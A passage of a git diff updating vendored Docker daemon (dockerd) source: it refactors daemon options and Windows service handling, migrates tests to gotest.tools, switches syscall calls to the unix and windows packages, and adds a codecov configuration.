syscall.Umask(desiredUmask); umask != desiredUmask { + unix.Umask(desiredUmask) + if umask := unix.Umask(desiredUmask); umask != desiredUmask { return fmt.Errorf("failed to set umask: expected %#o, got %#o", desiredUmask, umask) } @@ -47,42 +36,37 @@ func getDaemonConfDir(_ string) string { return "/etc/docker" } -// setupConfigReloadTrap configures the USR2 signal to reload the configuration. -func (cli *DaemonCli) setupConfigReloadTrap() { - c := make(chan os.Signal, 1) - signal.Notify(c, syscall.SIGHUP) - go func() { - for range c { - cli.reloadConfig() - } - }() -} - -func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption { +func (cli *DaemonCli) getPlatformRemoteOptions() ([]libcontainerd.RemoteOption, error) { opts := []libcontainerd.RemoteOption{ - libcontainerd.WithDebugLog(cli.Config.Debug), libcontainerd.WithOOMScore(cli.Config.OOMScoreAdjust), + libcontainerd.WithPlugin("linux", &linux.Config{ + Shim: daemon.DefaultShimBinary, + Runtime: daemon.DefaultRuntimeBinary, + RuntimeRoot: filepath.Join(cli.Config.Root, "runc"), + ShimDebug: cli.Config.Debug, + }), + } + if cli.Config.Debug { + opts = append(opts, libcontainerd.WithLogLevel("debug")) } if cli.Config.ContainerdAddr != "" { opts = append(opts, libcontainerd.WithRemoteAddr(cli.Config.ContainerdAddr)) } else { opts = append(opts, libcontainerd.WithStartDaemon(true)) } - if daemon.UsingSystemd(cli.Config) { - args := []string{"--systemd-cgroup=true"} - opts = append(opts, libcontainerd.WithRuntimeArgs(args)) - } - if cli.Config.LiveRestoreEnabled { - opts = append(opts, libcontainerd.WithLiveRestore(true)) - } - opts = append(opts, libcontainerd.WithRuntimePath(daemon.DefaultRuntimeBinary)) - return opts + + return opts, nil } -// getLibcontainerdRoot gets the root directory for libcontainerd/containerd to -// store their state. -func (cli *DaemonCli) getLibcontainerdRoot() string { - return filepath.Join(cli.Config.ExecRoot, "libcontainerd") +// setupConfigReloadTrap configures the USR2 signal to reload the configuration. +func (cli *DaemonCli) setupConfigReloadTrap() { + c := make(chan os.Signal, 1) + signal.Notify(c, unix.SIGHUP) + go func() { + for range c { + cli.reloadConfig() + } + }() } // getSwarmRunRoot gets the root directory for swarm to store runtime state @@ -120,17 +104,13 @@ func allocateDaemonPort(addr string) error { return nil } -// notifyShutdown is called after the daemon shuts down but before the process exits. -func notifyShutdown(err error) { -} - func wrapListeners(proto string, ls []net.Listener) []net.Listener { switch proto { case "unix": - ls[0] = &hack.MalformedHostHeaderOverride{ls[0]} + ls[0] = &hack.MalformedHostHeaderOverride{Listener: ls[0]} case "fd": for i := range ls { - ls[i] = &hack.MalformedHostHeaderOverride{ls[i]} + ls[i] = &hack.MalformedHostHeaderOverride{Listener: ls[i]} } } return ls diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go index d66dba77e1..692d0328c4 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go @@ -1,50 +1,49 @@ -// +build !windows,!solaris - -// TODO: Create new file for Solaris which tests config parameters -// as described in daemon/config_solaris.go +// +build !windows package main import ( - "github.com/docker/docker/daemon" - "github.com/docker/docker/pkg/testutil/assert" - "github.com/docker/docker/pkg/testutil/tempfile" "testing" + + "github.com/docker/docker/daemon/config" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" ) func TestLoadDaemonCliConfigWithDaemonFlags(t *testing.T) { content := `{"log-opts": {"max-size": "1k"}}` - tempFile := tempfile.NewTempFile(t, "config", content) + tempFile := fs.NewFile(t, "config", fs.WithContent(content)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) - opts.common.Debug = true - opts.common.LogLevel = "info" - assert.NilError(t, opts.flags.Set("selinux-enabled", "true")) + opts := defaultOptions(tempFile.Path()) + opts.Debug = true + opts.LogLevel = "info" + assert.Check(t, opts.flags.Set("selinux-enabled", "true")) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) + assert.Assert(t, loadedConfig != nil) - assert.Equal(t, loadedConfig.Debug, true) - assert.Equal(t, loadedConfig.LogLevel, "info") - assert.Equal(t, loadedConfig.EnableSelinuxSupport, true) - assert.Equal(t, loadedConfig.LogConfig.Type, "json-file") - assert.Equal(t, loadedConfig.LogConfig.Config["max-size"], "1k") + assert.Check(t, loadedConfig.Debug) + assert.Check(t, is.Equal("info", loadedConfig.LogLevel)) + assert.Check(t, loadedConfig.EnableSelinuxSupport) + assert.Check(t, is.Equal("json-file", loadedConfig.LogConfig.Type)) + assert.Check(t, is.Equal("1k", loadedConfig.LogConfig.Config["max-size"])) } func TestLoadDaemonConfigWithNetwork(t *testing.T) { content := `{"bip": "127.0.0.2", "ip": "127.0.0.1"}` - tempFile := tempfile.NewTempFile(t, "config", content) + tempFile := fs.NewFile(t, "config", fs.WithContent(content)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) + assert.Assert(t, loadedConfig != nil) - assert.Equal(t, loadedConfig.IP, "127.0.0.2") - assert.Equal(t, loadedConfig.DefaultIP.String(), "127.0.0.1") + assert.Check(t, is.Equal("127.0.0.2", loadedConfig.IP)) + assert.Check(t, is.Equal("127.0.0.1", loadedConfig.DefaultIP.String())) } func TestLoadDaemonConfigWithMapOptions(t *testing.T) { @@ -52,63 +51,49 @@ func TestLoadDaemonConfigWithMapOptions(t *testing.T) { "cluster-store-opts": {"kv.cacertfile": "/var/lib/docker/discovery_certs/ca.pem"}, "log-opts": {"tag": "test"} }` - tempFile := tempfile.NewTempFile(t, "config", content) + tempFile := fs.NewFile(t, "config", fs.WithContent(content)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.NotNil(t, loadedConfig.ClusterOpts) + assert.Assert(t, loadedConfig != nil) + assert.Check(t, loadedConfig.ClusterOpts != nil) expectedPath := "/var/lib/docker/discovery_certs/ca.pem" - assert.Equal(t, loadedConfig.ClusterOpts["kv.cacertfile"], expectedPath) - assert.NotNil(t, loadedConfig.LogConfig.Config) - assert.Equal(t, loadedConfig.LogConfig.Config["tag"], "test") + assert.Check(t, is.Equal(expectedPath, loadedConfig.ClusterOpts["kv.cacertfile"])) + assert.Check(t, loadedConfig.LogConfig.Config != nil) + assert.Check(t, is.Equal("test", loadedConfig.LogConfig.Config["tag"])) } func TestLoadDaemonConfigWithTrueDefaultValues(t *testing.T) { content := `{ "userland-proxy": false }` - tempFile := tempfile.NewTempFile(t, "config", content) + tempFile := fs.NewFile(t, "config", fs.WithContent(content)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.NotNil(t, loadedConfig.ClusterOpts) + assert.Assert(t, loadedConfig != nil) - assert.Equal(t, loadedConfig.EnableUserlandProxy, false) + assert.Check(t, !loadedConfig.EnableUserlandProxy) // make sure reloading doesn't generate configuration // conflicts after normalizing boolean values. - reload := func(reloadedConfig *daemon.Config) { - assert.Equal(t, reloadedConfig.EnableUserlandProxy, false) + reload := func(reloadedConfig *config.Config) { + assert.Check(t, !reloadedConfig.EnableUserlandProxy) } - assert.NilError(t, daemon.ReloadConfiguration(opts.configFile, opts.flags, reload)) + assert.Check(t, config.Reload(opts.configFile, opts.flags, reload)) } func TestLoadDaemonConfigWithTrueDefaultValuesLeaveDefaults(t *testing.T) { - tempFile := tempfile.NewTempFile(t, "config", `{}`) + tempFile := fs.NewFile(t, "config", fs.WithContent(`{}`)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.NotNil(t, loadedConfig.ClusterOpts) - - assert.Equal(t, loadedConfig.EnableUserlandProxy, true) -} + assert.Assert(t, loadedConfig != nil) -func TestLoadDaemonConfigWithLegacyRegistryOptions(t *testing.T) { - content := `{"disable-legacy-registry": true}` - tempFile := tempfile.NewTempFile(t, "config", content) - defer tempFile.Remove() - - opts := defaultOptions(tempFile.Name()) - loadedConfig, err := loadDaemonCliConfig(opts) - assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.V2Only, true) + assert.Check(t, loadedConfig.EnableUserlandProxy) } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go index 4cccd32688..224c509455 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go @@ -5,21 +5,14 @@ import ( "net" "os" "path/filepath" - "syscall" - "github.com/Sirupsen/logrus" "github.com/docker/docker/libcontainerd" - "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" + "golang.org/x/sys/windows" ) var defaultDaemonConfigFile = "" -// currentUserIsOwner checks whether the current user is the owner of the given -// file. -func currentUserIsOwner(f string) bool { - return false -} - // setDefaultUmask doesn't do anything on windows func setDefaultUmask() error { return nil @@ -29,8 +22,10 @@ func getDaemonConfDir(root string) string { return filepath.Join(root, `\config`) } -// notifySystem sends a message to the host when the server is ready to be used -func notifySystem() { +// preNotifySystem sends a message to the host when the API is active, but before the daemon is +func preNotifySystem() { + // start the service now to prevent timeouts waiting for daemon to start + // but still (eventually) complete all requests that are sent after this if service != nil { err := service.started() if err != nil { @@ -39,6 +34,10 @@ func notifySystem() { } } +// notifySystem sends a message to the host when the server is ready to be used +func notifySystem() { +} + // notifyShutdown is called after the daemon shuts down but before the process exits. func notifyShutdown(err error) { if service != nil { @@ -49,34 +48,28 @@ func notifyShutdown(err error) { } } +func (cli *DaemonCli) getPlatformRemoteOptions() ([]libcontainerd.RemoteOption, error) { + return nil, nil +} + // setupConfigReloadTrap configures a Win32 event to reload the configuration. func (cli *DaemonCli) setupConfigReloadTrap() { go func() { - sa := syscall.SecurityAttributes{ + sa := windows.SecurityAttributes{ Length: 0, } - ev := "Global\\docker-daemon-config-" + fmt.Sprint(os.Getpid()) - if h, _ := system.CreateEvent(&sa, false, false, ev); h != 0 { - logrus.Debugf("Config reload - waiting signal at %s", ev) + event := "Global\\docker-daemon-config-" + fmt.Sprint(os.Getpid()) + ev, _ := windows.UTF16PtrFromString(event) + if h, _ := windows.CreateEvent(&sa, 0, 0, ev); h != 0 { + logrus.Debugf("Config reload - waiting signal at %s", event) for { - syscall.WaitForSingleObject(h, syscall.INFINITE) + windows.WaitForSingleObject(h, windows.INFINITE) cli.reloadConfig() } } }() } -func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption { - return nil -} - -// getLibcontainerdRoot gets the root directory for libcontainerd to store its -// state. The Windows libcontainerd implementation does not need to write a spec -// or state to disk, so this is a no-op. -func (cli *DaemonCli) getLibcontainerdRoot() string { - return "" -} - // getSwarmRunRoot gets the root directory for swarm to store runtime state // For example, the control socket func (cli *DaemonCli) getSwarmRunRoot() string { diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker.go b/vendor/github.com/docker/docker/cmd/dockerd/docker.go index 60742ae927..463482e938 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/docker.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/docker.go @@ -3,33 +3,19 @@ package main import ( "fmt" "os" - "path/filepath" "runtime" - "github.com/Sirupsen/logrus" "github.com/docker/docker/cli" - cliflags "github.com/docker/docker/cli/flags" - "github.com/docker/docker/daemon" + "github.com/docker/docker/daemon/config" "github.com/docker/docker/dockerversion" "github.com/docker/docker/pkg/reexec" "github.com/docker/docker/pkg/term" + "github.com/sirupsen/logrus" "github.com/spf13/cobra" - "github.com/spf13/pflag" ) -type daemonOptions struct { - version bool - configFile string - daemonConfig *daemon.Config - common *cliflags.CommonOptions - flags *pflag.FlagSet -} - func newDaemonCommand() *cobra.Command { - opts := daemonOptions{ - daemonConfig: daemon.NewConfig(), - common: cliflags.NewCommonOptions(), - } + opts := newDaemonOptions(config.New()) cmd := &cobra.Command{ Use: "dockerd [OPTIONS]", @@ -41,57 +27,21 @@ func newDaemonCommand() *cobra.Command { opts.flags = cmd.Flags() return runDaemon(opts) }, + DisableFlagsInUseLine: true, + Version: fmt.Sprintf("%s, build %s", dockerversion.Version, dockerversion.GitCommit), } cli.SetupRootCommand(cmd) flags := cmd.Flags() - flags.BoolVarP(&opts.version, "version", "v", false, "Print version information and quit") - flags.StringVar(&opts.configFile, flagDaemonConfigFile, defaultDaemonConfigFile, "Daemon configuration file") - opts.common.InstallFlags(flags) - opts.daemonConfig.InstallFlags(flags) + flags.BoolP("version", "v", false, "Print version information and quit") + flags.StringVar(&opts.configFile, "config-file", defaultDaemonConfigFile, "Daemon configuration file") + opts.InstallFlags(flags) + installConfigFlags(opts.daemonConfig, flags) installServiceFlags(flags) return cmd } -func runDaemon(opts daemonOptions) error { - if opts.version { - showVersion() - return nil - } - - daemonCli := NewDaemonCli() - - // Windows specific settings as these are not defaulted. - if runtime.GOOS == "windows" { - if opts.daemonConfig.Pidfile == "" { - opts.daemonConfig.Pidfile = filepath.Join(opts.daemonConfig.Root, "docker.pid") - } - if opts.configFile == "" { - opts.configFile = filepath.Join(opts.daemonConfig.Root, `config\daemon.json`) - } - } - - // On Windows, this may be launching as a service or with an option to - // register the service. - stop, err := initService(daemonCli) - if err != nil { - logrus.Fatal(err) - } - - if stop { - return nil - } - - err = daemonCli.start(opts) - notifyShutdown(err) - return err -} - -func showVersion() { - fmt.Printf("Docker version %s, build %s\n", dockerversion.Version, dockerversion.GitCommit) -} - func main() { if reexec.Init() { return @@ -99,7 +49,14 @@ func main() { // Set terminal emulation based on platform as required. _, stdout, stderr := term.StdStreams() - logrus.SetOutput(stderr) + + // @jhowardmsft - maybe there is a historic reason why on non-Windows, stderr is used + // here. However, on Windows it makes no sense and there is no need. + if runtime.GOOS == "windows" { + logrus.SetOutput(stdout) + } else { + logrus.SetOutput(stderr) + } cmd := newDaemonCommand() cmd.SetOutput(stdout) diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/docker_unix.go new file mode 100644 index 0000000000..0dec48663d --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/docker_unix.go @@ -0,0 +1,8 @@ +// +build !windows + +package main + +func runDaemon(opts *daemonOptions) error { + daemonCli := NewDaemonCli() + return daemonCli.start(opts) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go index 19c5587cb6..bd8bc5a58e 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go @@ -1,18 +1,38 @@ package main import ( - "sync/atomic" + "path/filepath" _ "github.com/docker/docker/autogen/winresources/dockerd" + "github.com/sirupsen/logrus" ) -//go:cgo_import_dynamic main.dummy CommandLineToArgvW%2 "shell32.dll" +func runDaemon(opts *daemonOptions) error { + daemonCli := NewDaemonCli() -var dummy uintptr + // On Windows, this may be launching as a service or with an option to + // register the service. + stop, runAsService, err := initService(daemonCli) + if err != nil { + logrus.Fatal(err) + } -func init() { - // Ensure that this import is not removed by the linker. This is used to - // ensure that shell32.dll is loaded by the system loader, preventing - // go#15286 from triggering on Nano Server TP5. - atomic.LoadUintptr(&dummy) + if stop { + return nil + } + + // Windows specific settings as these are not defaulted. + if opts.configFile == "" { + opts.configFile = filepath.Join(opts.daemonConfig.Root, `config\daemon.json`) + } + if runAsService { + // If Windows SCM manages the service - no need for PID files + opts.daemonConfig.Pidfile = "" + } else if opts.daemonConfig.Pidfile == "" { + opts.daemonConfig.Pidfile = filepath.Join(opts.daemonConfig.Root, "docker.pid") + } + + err = daemonCli.start(opts) + notifyShutdown(err) + return err } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go index d4aa3ddd73..ddd5eb9d8b 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go @@ -1,6 +1,6 @@ // +build !windows -package hack +package hack // import "github.com/docker/docker/cmd/dockerd/hack" import "net" @@ -111,7 +111,7 @@ func (l *MalformedHostHeaderOverrideConn) Read(b []byte) (n int, err error) { } // Accept makes the listener accepts connections and wraps the connection -// in a MalformedHostHeaderOverrideConn initilizing first to true. +// in a MalformedHostHeaderOverrideConn initializing first to true. func (l *MalformedHostHeaderOverride) Accept() (net.Conn, error) { c, err := l.Listener.Accept() if err != nil { diff --git a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go index 1a0a60baf3..6874b059be 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go @@ -1,6 +1,6 @@ // +build !windows -package hack +package hack // import "github.com/docker/docker/cmd/dockerd/hack" import ( "bytes" diff --git a/vendor/github.com/docker/docker/cmd/dockerd/metrics.go b/vendor/github.com/docker/docker/cmd/dockerd/metrics.go index 0c8860408b..20ceaf8466 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/metrics.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/metrics.go @@ -4,8 +4,8 @@ import ( "net" "net/http" - "github.com/Sirupsen/logrus" - metrics "github.com/docker/go-metrics" + "github.com/docker/go-metrics" + "github.com/sirupsen/logrus" ) func startMetricsServer(addr string) error { diff --git a/vendor/github.com/docker/docker/cli/flags/common.go b/vendor/github.com/docker/docker/cmd/dockerd/options.go similarity index 56% rename from vendor/github.com/docker/docker/cli/flags/common.go rename to vendor/github.com/docker/docker/cmd/dockerd/options.go index e2f9da0732..a6276add59 100644 --- a/vendor/github.com/docker/docker/cli/flags/common.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/options.go @@ -1,27 +1,26 @@ -package flags +package main import ( "fmt" "os" "path/filepath" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/cliconfig" + cliconfig "github.com/docker/docker/cli/config" + "github.com/docker/docker/daemon/config" "github.com/docker/docker/opts" "github.com/docker/go-connections/tlsconfig" + "github.com/sirupsen/logrus" "github.com/spf13/pflag" ) const ( - // DefaultTrustKeyFile is the default filename for the trust key - DefaultTrustKeyFile = "key.json" // DefaultCaFile is the default filename for the CA pem file DefaultCaFile = "ca.pem" // DefaultKeyFile is the default filename for the key pem file DefaultKeyFile = "key.pem" // DefaultCertFile is the default filename for the cert pem file DefaultCertFile = "cert.pem" - // FlagTLSVerify is the flag name for the tls verification option + // FlagTLSVerify is the flag name for the TLS verification option FlagTLSVerify = "tlsverify" ) @@ -30,65 +29,68 @@ var ( dockerTLSVerify = os.Getenv("DOCKER_TLS_VERIFY") != "" ) -// CommonOptions are options common to both the client and the daemon. -type CommonOptions struct { - Debug bool - Hosts []string - LogLevel string - TLS bool - TLSVerify bool - TLSOptions *tlsconfig.Options - TrustKey string +type daemonOptions struct { + configFile string + daemonConfig *config.Config + flags *pflag.FlagSet + Debug bool + Hosts []string + LogLevel string + TLS bool + TLSVerify bool + TLSOptions *tlsconfig.Options } -// NewCommonOptions returns a new CommonOptions -func NewCommonOptions() *CommonOptions { - return &CommonOptions{} +// newDaemonOptions returns a new daemonFlags +func newDaemonOptions(config *config.Config) *daemonOptions { + return &daemonOptions{ + daemonConfig: config, + } } // InstallFlags adds flags for the common options on the FlagSet -func (commonOpts *CommonOptions) InstallFlags(flags *pflag.FlagSet) { +func (o *daemonOptions) InstallFlags(flags *pflag.FlagSet) { if dockerCertPath == "" { - dockerCertPath = cliconfig.ConfigDir() + dockerCertPath = cliconfig.Dir() } - flags.BoolVarP(&commonOpts.Debug, "debug", "D", false, "Enable debug mode") - flags.StringVarP(&commonOpts.LogLevel, "log-level", "l", "info", "Set the logging level (\"debug\", \"info\", \"warn\", \"error\", \"fatal\")") - flags.BoolVar(&commonOpts.TLS, "tls", false, "Use TLS; implied by --tlsverify") - flags.BoolVar(&commonOpts.TLSVerify, FlagTLSVerify, dockerTLSVerify, "Use TLS and verify the remote") + flags.BoolVarP(&o.Debug, "debug", "D", false, "Enable debug mode") + flags.StringVarP(&o.LogLevel, "log-level", "l", "info", `Set the logging level ("debug"|"info"|"warn"|"error"|"fatal")`) + flags.BoolVar(&o.TLS, "tls", false, "Use TLS; implied by --tlsverify") + flags.BoolVar(&o.TLSVerify, FlagTLSVerify, dockerTLSVerify, "Use TLS and verify the remote") // TODO use flag flags.String("identity"}, "i", "", "Path to libtrust key file") - commonOpts.TLSOptions = &tlsconfig.Options{ + o.TLSOptions = &tlsconfig.Options{ CAFile: filepath.Join(dockerCertPath, DefaultCaFile), CertFile: filepath.Join(dockerCertPath, DefaultCertFile), KeyFile: filepath.Join(dockerCertPath, DefaultKeyFile), } - tlsOptions := commonOpts.TLSOptions + tlsOptions := o.TLSOptions flags.Var(opts.NewQuotedString(&tlsOptions.CAFile), "tlscacert", "Trust certs signed only by this CA") flags.Var(opts.NewQuotedString(&tlsOptions.CertFile), "tlscert", "Path to TLS certificate file") flags.Var(opts.NewQuotedString(&tlsOptions.KeyFile), "tlskey", "Path to TLS key file") - hostOpt := opts.NewNamedListOptsRef("hosts", &commonOpts.Hosts, opts.ValidateHost) + hostOpt := opts.NewNamedListOptsRef("hosts", &o.Hosts, opts.ValidateHost) flags.VarP(hostOpt, "host", "H", "Daemon socket(s) to connect to") } // SetDefaultOptions sets default values for options after flag parsing is // complete -func (commonOpts *CommonOptions) SetDefaultOptions(flags *pflag.FlagSet) { +func (o *daemonOptions) SetDefaultOptions(flags *pflag.FlagSet) { // Regardless of whether the user sets it to true or false, if they - // specify --tlsverify at all then we need to turn on tls + // specify --tlsverify at all then we need to turn on TLS // TLSVerify can be true even if not set due to DOCKER_TLS_VERIFY env var, so we need // to check that here as well - if flags.Changed(FlagTLSVerify) || commonOpts.TLSVerify { - commonOpts.TLS = true + if flags.Changed(FlagTLSVerify) || o.TLSVerify { + o.TLS = true } - if !commonOpts.TLS { - commonOpts.TLSOptions = nil + if !o.TLS { + o.TLSOptions = nil } else { - tlsOptions := commonOpts.TLSOptions - tlsOptions.InsecureSkipVerify = !commonOpts.TLSVerify + tlsOptions := o.TLSOptions + tlsOptions.InsecureSkipVerify = !o.TLSVerify // Reset CertFile and KeyFile to empty string if the user did not specify // the respective flags and the respective default files were not found. @@ -105,8 +107,8 @@ func (commonOpts *CommonOptions) SetDefaultOptions(flags *pflag.FlagSet) { } } -// SetLogLevel sets the logrus logging level -func SetLogLevel(logLevel string) { +// setLogLevel sets the logrus logging level +func setLogLevel(logLevel string) { if logLevel != "" { lvl, err := logrus.ParseLevel(logLevel) if err != nil { diff --git a/vendor/github.com/docker/docker/cmd/dockerd/options_test.go b/vendor/github.com/docker/docker/cmd/dockerd/options_test.go new file mode 100644 index 0000000000..691118f08f --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/options_test.go @@ -0,0 +1,44 @@ +package main + +import ( + "path/filepath" + "testing" + + cliconfig "github.com/docker/docker/cli/config" + "github.com/docker/docker/daemon/config" + "github.com/spf13/pflag" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestCommonOptionsInstallFlags(t *testing.T) { + flags := pflag.NewFlagSet("testing", pflag.ContinueOnError) + opts := newDaemonOptions(&config.Config{}) + opts.InstallFlags(flags) + + err := flags.Parse([]string{ + "--tlscacert=\"/foo/cafile\"", + "--tlscert=\"/foo/cert\"", + "--tlskey=\"/foo/key\"", + }) + assert.Check(t, err) + assert.Check(t, is.Equal("/foo/cafile", opts.TLSOptions.CAFile)) + assert.Check(t, is.Equal("/foo/cert", opts.TLSOptions.CertFile)) + assert.Check(t, is.Equal(opts.TLSOptions.KeyFile, "/foo/key")) +} + +func defaultPath(filename string) string { + return filepath.Join(cliconfig.Dir(), filename) +} + +func TestCommonOptionsInstallFlagsWithDefaults(t *testing.T) { + flags := pflag.NewFlagSet("testing", pflag.ContinueOnError) + opts := newDaemonOptions(&config.Config{}) + opts.InstallFlags(flags) + + err := flags.Parse([]string{}) + assert.Check(t, err) + assert.Check(t, is.Equal(defaultPath("ca.pem"), opts.TLSOptions.CAFile)) + assert.Check(t, is.Equal(defaultPath("cert.pem"), opts.TLSOptions.CertFile)) + assert.Check(t, is.Equal(defaultPath("key.pem"), opts.TLSOptions.KeyFile)) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go b/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go index 64ad7fcaa0..bbcb7f3f3b 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go @@ -6,9 +6,5 @@ import ( "github.com/spf13/pflag" ) -func initService(daemonCli *DaemonCli) (bool, error) { - return false, nil -} - func installServiceFlags(flags *pflag.FlagSet) { } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go index dd37abcf3c..00432af643 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go @@ -5,15 +5,15 @@ import ( "errors" "fmt" "io/ioutil" + "log" "os" "os/exec" "path/filepath" - "syscall" "time" "unsafe" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" "github.com/spf13/pflag" "golang.org/x/sys/windows" "golang.org/x/sys/windows/svc" @@ -29,7 +29,7 @@ var ( flRunService *bool setStdHandle = windows.NewLazySystemDLL("kernel32.dll").NewProc("SetStdHandle") - oldStderr syscall.Handle + oldStderr windows.Handle panicFile *os.File service *handler @@ -130,14 +130,14 @@ func (h *etwHook) Fire(e *logrus.Entry) error { err error ) - ss[0], err = syscall.UTF16PtrFromString(e.Message) + ss[0], err = windows.UTF16PtrFromString(e.Message) if err != nil { return err } count := uint16(1) if exts != "" { - ss[1], err = syscall.UTF16PtrFromString(exts) + ss[1], err = windows.UTF16PtrFromString(exts) if err != nil { return err } @@ -230,12 +230,7 @@ func registerService() error { return err } - err = eventlog.Install(*flServiceName, p, false, eventlog.Info|eventlog.Warning|eventlog.Error) - if err != nil { - return err - } - - return nil + return eventlog.Install(*flServiceName, p, false, eventlog.Info|eventlog.Warning|eventlog.Error) } func unregisterService() error { @@ -259,25 +254,28 @@ func unregisterService() error { return nil } -func initService(daemonCli *DaemonCli) (bool, error) { +// initService is the entry point for running the daemon as a Windows +// service. It returns an indication to stop (if registering/un-registering); +// an indication of whether it is running as a service; and an error. +func initService(daemonCli *DaemonCli) (bool, bool, error) { if *flUnregisterService { if *flRegisterService { - return true, errors.New("--register-service and --unregister-service cannot be used together") + return true, false, errors.New("--register-service and --unregister-service cannot be used together") } - return true, unregisterService() + return true, false, unregisterService() } if *flRegisterService { - return true, registerService() + return true, false, registerService() } if !*flRunService { - return false, nil + return false, false, nil } interactive, err := svc.IsAnInteractiveSession() if err != nil { - return false, err + return false, false, err } h := &handler{ @@ -290,7 +288,7 @@ func initService(daemonCli *DaemonCli) (bool, error) { if !interactive { log, err = eventlog.Open(*flServiceName) if err != nil { - return false, err + return false, false, err } } @@ -311,9 +309,9 @@ func initService(daemonCli *DaemonCli) (bool, error) { // Wait for the first signal from the service handler. err = <-h.fromsvc if err != nil { - return false, err + return false, false, err } - return false, nil + return false, true, nil } func (h *handler) started() error { @@ -398,8 +396,8 @@ func initPanicFile(path string) error { // Update STD_ERROR_HANDLE to point to the panic file so that Go writes to // it when it panics. Remember the old stderr to restore it before removing // the panic file. - sh := syscall.STD_ERROR_HANDLE - h, err := syscall.GetStdHandle(sh) + sh := windows.STD_ERROR_HANDLE + h, err := windows.GetStdHandle(uint32(sh)) if err != nil { return err } @@ -411,13 +409,19 @@ func initPanicFile(path string) error { return err } + // Reset os.Stderr to the panic file (so fmt.Fprintf(os.Stderr,...) actually gets redirected) + os.Stderr = os.NewFile(uintptr(panicFile.Fd()), "/dev/stderr") + + // Force threads that panic to write to stderr (the panicFile handle now), otherwise it will go into the ether + log.SetOutput(os.Stderr) + return nil } func removePanicFile() { if st, err := panicFile.Stat(); err == nil { if st.Size() == 0 { - sh := syscall.STD_ERROR_HANDLE + sh := windows.STD_ERROR_HANDLE setStdHandle.Call(uintptr(sh), uintptr(oldStderr)) panicFile.Close() os.Remove(panicFile.Name()) diff --git a/vendor/github.com/docker/docker/codecov.yml b/vendor/github.com/docker/docker/codecov.yml new file mode 100644 index 0000000000..594265c6cf --- /dev/null +++ b/vendor/github.com/docker/docker/codecov.yml @@ -0,0 +1,17 @@ +comment: + layout: header, changes, diff, sunburst +coverage: + status: + patch: + default: + target: 50% + only_pulls: true + # project will give us the diff in the total code coverage between a commit + # and its parent + project: + default: + target: auto + threshold: "15%" + changes: false +ignore: + - "vendor/*" diff --git a/vendor/github.com/docker/docker/container/archive.go b/vendor/github.com/docker/docker/container/archive.go index 56e6598b9c..ed72c4a405 100644 --- 